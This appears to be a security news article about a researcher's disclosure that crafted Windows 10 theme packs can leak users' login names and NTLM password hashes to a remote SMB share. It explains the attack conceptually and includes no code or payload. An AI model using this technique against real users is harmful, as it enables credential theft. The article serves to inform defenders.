Specially crafted Windows 10 themes and theme packs can be used in ‘Pass-the-Hash’ attacks to steal Windows account credentials from unsuspecting users. Windows allows users to create custom themes that contain customized colors, sounds, mouse cursors, and the wallpaper that the operating system will use. Windows users can then switch between different themes as desired to change the appearance of the operating system. A theme’s settings are saved under the %AppData%\Microsoft\Windows\Themes folder as a file with a .theme extension, such as ‘Custom Dark.theme.’ Windows themes can then be shared with other users by right-clicking on an active theme and selecting ‘Save theme for sharing,’ which will package the theme into a ‘.deskthemepack’ file. These desktop theme packs can then be shared via email or as downloads on websites, and installed by double-clicking them.
This weekend security researcher Jimmy Bayne (@bohops) revealed that specially crafted Windows themes could be used to perform Pass-the-Hash attacks. Pass-the-Hash attacks are used to steal Windows login names and password hashes by tricking a user into accessing a remote SMB share that requires authentication. When trying to access the remote resource, Windows will automatically try to login to the remote system by sending the Windows user’s login name and an NTLM hash of their password. In a Pass-the-Hash attack, the sent credentials are harvested by the attackers, who then attempt to dehash the password to access the visitors’ login name and password.